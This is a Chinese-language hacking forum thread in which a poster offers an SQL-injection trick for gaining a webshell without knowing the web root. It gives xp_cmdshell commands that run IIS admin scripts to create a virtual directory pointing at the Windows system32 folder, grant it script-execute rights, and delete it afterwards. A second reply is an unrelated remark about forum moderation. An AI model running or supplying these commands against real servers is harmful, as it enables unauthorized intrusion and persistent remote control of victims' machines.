技术论坛 › windows技术 › SQL注入建立虚拟目录，免得找Web绝对路径

dirtysea 发表于 2008-11-24 19:09:48

SQL注入建立虚拟目录，免得找Web绝对路径

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：<BR><BR>exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'<BR>建立虚拟目录win,指向c:\winnt\system32<BR>exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'<BR>让win句有解析asp脚本权限<BR><BR>exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"<BR>删除虚拟目录。<BR>找不到web绝对路径的一种解决办法，<BR><BR>403错误，表示虚拟目录建好了。。

dirtysea 发表于 2006-6-15 23:27:56

re:SQL注入建立虚拟目录，免得找Web绝对路径

继续吧，先考验你一个星期！你要哪个区的斑竹？<A href="http://www.dirtysea.com/bbs/main.asp?layer_1=A_4&amp;layer_2=A_4_23" target=main><FONT color=#0000cc>灌水笑话专区</FONT></A>？

查看完整版本: SQL注入建立虚拟目录，免得找Web绝对路径